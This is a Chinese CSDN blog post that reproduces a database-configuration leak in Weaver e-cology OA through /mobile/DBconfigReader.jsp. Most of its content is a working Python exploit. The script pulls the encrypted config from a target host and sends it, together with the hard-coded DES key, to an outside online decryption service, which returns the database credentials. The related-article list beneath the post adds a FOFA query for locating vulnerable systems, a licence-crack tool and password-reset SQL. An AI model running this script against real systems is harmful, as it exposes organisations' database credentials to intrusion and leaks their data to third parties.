泛微mysql密码_泛微ecology OA数据库配置信息泄露

最新推荐文章于 2024-07-15 17:57:30 发布
最新推荐文章于 2024-07-15 17:57:30 发布
阅读量719 收藏
点赞数
文章标签: 泛微mysql密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29655399/article/details/113305384
版权

漏洞详情#

泛微e-cology OA系统/mobile/DBconfigReader.jsp存在未授权访问,通过解密,可直接获取数据库配置信息。

利用前提

/mobile/DBconfigReader.jsp存在未授权访问。

漏洞复现#

利用github的exp报错,解密踩坑如下:

乱码,需要用b64加密后用密钥解密

\r\n,详见参考链接

最终python脚本如下:

import base64

import requests

import ast

def req(url):

headers = {

'Content-Type':'application/x-www-form-urlencoded',

'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',

}

r1 = requests.get(url,headers=headers).content

s = r1.replace('\r\n','')

res1 = base64.b64encode(s)

postdata = {

'data':res1,

'type':'des',

'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'

}

u = 'http://tool.chacuo.net/cryptdes'

r2 = requests.post(u,data=postdata,headers=headers).content

res2 = ast.literal_eval(r2)

return res2['data']

url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'

print req(url)

大禹昆仑
关注
泛微 e-office 10 schema_mysql.sql文件存在敏感信息泄露 附POC
nnn2188185的博客
08-15 286
泛微 e-office 10 schema_mysql.sql文件存在敏感信息泄露 附POC
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
Sylon的博客
10-31 109
2漏洞详情 攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器. 2影响范围 目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版 3|0漏洞复...
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞_e-cology运维管理平台 漏洞
最新发布
韩束一叶子
07-15 1052
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞。漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
泛微OA系统E-office11中小企业全能OA办公系统默认的初始密码是什么
12-17 6981
泛微OA系统E-office11中小企业全能OA办公系统 的相关密码
泛微oa 配置文件-配置数据库ip sa密码
黄树茂博客
03-04 6258
如果不记得sa密码是多少,系统又能正常运行,可能通过查看weaver的配置文件找到sa密码。 这里我使用一个工具,叫filelocatorpro,马上就找到数据ip地址sa密码。 ...
DBconfigReader:泛微生态OA系统接口存在数据库配置信息扩展范围
03-14
泛微生态OA系统接口存在数据库配置信息扩展范围 /mobile/DBconfigReader.jsp http://xxxx:8090/mobile/DBconfigReader.jsp Fortify代码审计检测出-弱加密算法 SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(dks1); <%@ page language="java" contentType="text/html; charset=UTF-8"%> <%@ page import="weaver.file.Prop" %> <%@ page import="javax.crypto.spec.DESKeySpec" %> <%@ page import="javax.crypto.*" %> <% String conStr=P
【漏洞复现】泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
泛微Ecology9安装部署手册
10-23
泛微Ecology9是一款企业级协同管理软件,集成了企业资源计划(ERP)、客户关系管理(CRM)、项目管理(PM)等多项功能。Ecology9的安装部署涉及多个步骤,包括系统配置要求、数据库安装配置、应用系统安装、系统备份...
泛微OA ecology 7.1 0331 + 1407 补丁升级 安装 注册 视频教程
03-14
泛微OA Ecology 7.1 0331 + 1407 是一款企业级协同办公系统,专为提高企业工作效率和管理效能而设计。该版本包含了两个重要的补丁更新,0331和1407,旨在解决原有系统中的问题、提升性能以及增加新功能。本视频教程...
泛微OA7.8破解软件
04-20
简介: E-office 7.8 官方下載:http://www.weaver.com.cn/eoffice/eoffice.rar 使用方法: 文件解压到 eoffice\\webroot\\inc目录下 浏览器访问: http://127.0.0.1/inc/key.php 按要求生成授权文件,然后登录EOFFICE进行注冊即可。 不是80端口得请按http://127.0.0.1:端口号/inc/key.php
泛微E9数据中心技术支持常见问题.docx
10-23
泛微E9数据中心技术支持常见问题 泛微E9数据中心技术支持常见问题是泛微E9数据中心技术支持中常见的一些问题和解决方案的总结。这些问题涵盖了泛微E9数据中心技术支持的各个方面,包括界面、报表、数据抽取、数据...
泛微系统】e-cology非标配功能概览
烧硬盘
06-21 386
关于泛微非标功能的功能编号、功能名称及支持版本 编号 名称 支持版本 001 考勤功能 4.500.0124-9.00+KB900190206 002 短信通用接口 5.000.0327+KB50001003 及以上版本 004 计划任务接口 5.0+KB50001003及以上版本 005 集成登录接口 6.0及以上版本 006 流程中自定义浏览框 5.0+KB50001003及以上版本 007 流程节点前后附加操作接口 5.0+KB50001003及以上版本 008
泛微E9开发】集成登录之加密算法设置(二)
司徒剑南的博客
07-24 500
2、如果无法使用系统默认的加密算法,可以根据要求自行开发自定义加密算法,并在此处引用。加密方法、根据是情况填写,一般是encode。解密方法:根据是情况填写,一般是decode。1、系统默认自带加密算法供客户使用。加密算法:自行开发的加密算法类路径。是否需要秘钥:根据实际情况设置。是否需要向量:根据实际情况设置。
泛微OA如何重置管理员密码
qq_35805415的博客
08-08 7063
select*fromhrmresourcemanager 修改系统管理员密码:updatehrmresourcemanagersetpassword='C4CA4238A0B923820DCC509A6F75849B'whereid=1andlastname='系统管理员' 注意:密文可通过工具转换成明文直接查看。
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5270
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
泛微OA】通过sql控制选择项控制其他默认选择项为选择
weixin_47191459的博客
04-30 261
case是一个行级的语法,相当于对于每一行满足条件的数据,等到一个新的结果,也是新的一列。SQL 中case when ...then...else ...end用法。sqlb字段为申请类别 选了申请类别中的一个值 其他选择项的值也默认选中。需求:发起人选择项选的新增类型。其他默认角色及增加选择项为默认选择。
泛微OA】常用数据库表名
qq_44759590的博客
07-21 3148
(1)主表:formtable_main_数字(可在后端流程引擎-流程设置-流程路径-流程-表单管理-数据库表名查看)(2)明细表1:formtable_main_数字_dt1。(3)明细表2:formtable_main_数字_dt2。3、请求基本信息表(标题,创建人,创建时间,流程类型等等)7、下拉字段的值,通过fieldid,isbill查找。4、请求操作者表(流程当前未操作者,已操作者等信息)5、请求流转日志表(流程处理人处理过的审批意见)8、浏览框字段值的来源。
泛微移动平台2020V4.0安装指南
安装包内置了web服务(Tomcat)、消息服务(Openfire)、缓存数据库(Redis)和数据库MySQL)。网络环境要求包括移动平台需能访问外网,与集成的ecology系统间互访,且指定了各服务所需占用的端口,如MySQL、Redis...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值